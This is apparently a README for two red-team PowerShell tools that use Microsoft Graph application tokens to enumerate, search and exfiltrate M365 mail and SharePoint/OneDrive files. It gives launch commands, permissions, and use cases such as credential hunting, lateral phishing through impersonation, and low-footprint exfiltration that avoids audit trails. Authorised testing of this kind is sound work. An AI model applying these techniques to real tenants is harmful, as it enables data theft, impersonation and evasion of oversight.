Red Team tooling for Microsoft 365 exploitation via Microsoft Graph API.
Two WinForms GUI tools for enumerating, searching, and exfiltrating data from M365 environments using application-level OAuth tokens — no user interaction required.
| Tool | Target | What it does |
|---|---|---|
MailPwned-GUI.ps1 |
Exchange Online / Outlook | Browse mailboxes, search mail, download attachments, send impersonation emails |
SharePwned-GUI.ps1 |
SharePoint / OneDrive | Browse sites and drives, search files, preview and download documents |
These tools are intended exclusively for authorised red team engagements, penetration testing, and security research.
Using them against systems you do not own or have explicit written permission to test is illegal and may violate computer fraud laws (CFAA, Computer Misuse Act, etc.).
The authors accept no liability for any misuse or damage caused.
- PowerShell 5.1 (Windows PowerShell — no PS7 required)
- A registered Azure AD application with admin-consented Application permissions (see per-tool sections below)
Three authentication methods are supported by both tools:
-TenantId <guid> -ClientId <guid> -ClientSecret <secret>-TenantId <guid> -ClientId <guid> -CertificateThumbprint <thumb>-AccessToken <jwt>WinForms GUI for enumerating, searching, reading, and exfiltrating email from M365/Exchange Online environments.
| Permission | Required for |
|---|---|
Mail.Read |
Read mail in all mailboxes |
Mail.ReadWrite |
Send/reply/forward/delete (optional) |
User.Read.All |
Enumerate all mailboxes (global search) |
Note:
/v1.0/search/querywithmessageentityType does not support application permissions. User enumeration + per-mailbox search is the only viable approach with app tokens — this is exactly what MailPwned implements.
powershell.exe -STA -File .\MailPwned-GUI.ps1
-STA(Single-Threaded Apartment) is required for WinForms.
- Connect using tenant ID + client ID + secret, certificate thumbprint, or raw token
- Region selector for sovereign/GCC clouds (EUR, FRA, NAM, GBR, APC, AUS, CAN, IND, JPN)
- Load mailbox — browse folder tree, read emails with full HTML rendering
- Global search — search across all tenant mailboxes without loading a specific one
- Scoped search — search within a loaded mailbox
- HTML email preview — full rendering with inline image support (no external requests)
- Attachment download — single or bulk
- Compose / Reply / Reply-All / Forward — send impersonation emails
- Mark read/unread, Delete
- Export to CSV
- API log panel — real-time color-coded request/response log for debugging
- Credential hunting — search all mailboxes for
password,credentials,VPN,secret, etc. - Lateral phishing — read ongoing email threads and send convincing replies impersonating the compromised account
- Intelligence gathering — enumerate who is emailing whom, find sensitive projects, HR data, investor communications
- Exfiltration — bulk download attachments matching a search query
- Persistence discovery — search for MFA codes, password reset emails, token confirmations
A CLI version developped by Ethical-Kaizoku can be found here
WinForms GUI for enumerating, browsing, searching, previewing, and downloading files from SharePoint sites and OneDrive drives across the tenant.
| Permission | Required for |
|---|---|
Sites.Read.All |
Enumerate all SharePoint sites and browse drives |
Files.Read.All |
Read and download files from any drive |
User.Read.All |
Enumerate OneDrive drives for all users (optional) |
Fallback: When
Sites.Read.Allis unavailable, SharePwned falls back to per-user drive enumeration viaFiles.Read.All.
powershell.exe -STA -File .\SharePwned-GUI.ps1- Connect using tenant ID + client ID + secret, certificate thumbprint, or raw token
- Region selector for sovereign/GCC clouds
- Enumerate all SharePoint sites across the tenant
- Browse drive trees — navigate site document libraries and OneDrive folders
- Full-text search — keyword search across all drives (
/v1.0/search/querywithdriveItementity) - Fallback search — per-drive search when
Sites.Read.Allis absent - File preview — text extraction for documents, inline preview panel
- Download files — single file download with progress
- File type icons — extension-aware icon display in the file browser
- API log panel — real-time color-coded request/response log for debugging
- Credential hunting — search all SharePoint/OneDrive for
password,secret,private key, config files,.env, etc. - Intelligence gathering — enumerate project sites, HR drives, finance document libraries
- Exfiltration — download files of interest without leaving a large audit trail
- Access mapping — enumerate all sites the compromised app can reach to understand the blast radius
The Prefer: exchange.region=<region> header routes requests to the correct datacenter. Required when targeting tenants in non-default regions.
| Code | Region |
|---|---|
| EUR | Europe |
| FRA | France (sovereign) |
| NAM | North America |
| GBR | United Kingdom |
| APC | Asia Pacific |
| AUS | Australia |
| CAN | Canada |
| IND | India |
| JPN | Japan |
- All requests go directly to
https://graph.microsoft.com— no proxy or relay - The app token contains the
rolesclaim; Graph logs will show application-level access under the registered app's identity - Loading mailboxes from a file (
MailPwned) avoids callingGET /users— lower footprint when a UPN list is already available from OSINT or prior access - Downloaded HTML emails embed inline images as
data:URIs — no outbound requests when opened - Both tools suppress script errors and run fully offline after token acquisition
For educational and authorised security testing use only.